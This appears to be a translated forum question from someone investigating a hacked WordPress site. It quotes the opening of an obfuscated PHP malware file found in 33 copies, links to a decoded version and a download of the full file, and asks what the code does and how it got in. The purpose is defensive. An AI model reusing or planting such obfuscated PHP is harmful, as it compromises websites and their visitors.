Malware

What kind of virus attacked the wordpress site and how did it get to the hosting?

Good afternoon! A friend asked me to look into his sites. At the root of the site are the files admin.php, ajax.php, menu.php, themes.php, file/title.php, javascript.php, etc. (total 33 files), all the same size at 23148 ​​bytes, file start:

<?php ${"\x47\x4c\x4f\x42\x41LS"}["ki\x72g\x6c\x68\x72d"]="\x69\x70";${"\x47\x4c\x4fB\x41L \x53"}["f\x6aze\x76k"]="\x72e\x66\x65\x72\x65r";${"\x47\x4cO\x42A\x4cS"}["\x78\x6a\x63\x63 \x72\x78fv\x66\x6e\x79"]="\x66\x75\x6e\x63";${"\x47\x4cOB\x41\x4c\x53"}["\x79t\x6bo\x6c\x6ej" ]="\x68";${"GLO\x42AL\x53"}["\x70\x74\x6f\x65\x78\x75\x7a\x76\x6apl\x6c"]="h\x65\x61d\x65 \x72s";${"G\x4c\x4f\x42\x41\x4c\x53"}["\x6d\x69\x68\x63\x6a\x79p\x6d"]="re\x73";${" G\x4cO\x42A\x4c\x53"}["\x70u\x6f\x6e\x6fm"]="h\x5f\x64\x65\x74\x65c\x74e\x64";${"\x47\x4cO\ x42A\x4cS"}["\x7a\x66e\x69\x67\x76\x67\x6ar"]="\x64a\x74\x61"

Decoded view: www.unphp.net/decode/5e4a984491b820e1363e92c0091f2f49 Virustotal
result: https://www.virustotal.com/en/file/fd82de4bb7b5641...
Full original virus code: https://dl.dropboxusercontent.com/u/ 22105529/db.php
Questions:
1. What is the functionality of the virus? I did not find a meeting of eval, quotes ` and system, how else can you execute system commands in php?
2. How could he get on hosting? A friend swears that FTP passwords were not stored on his computer. I would like to establish a loophole to ensure that the infection does not recur.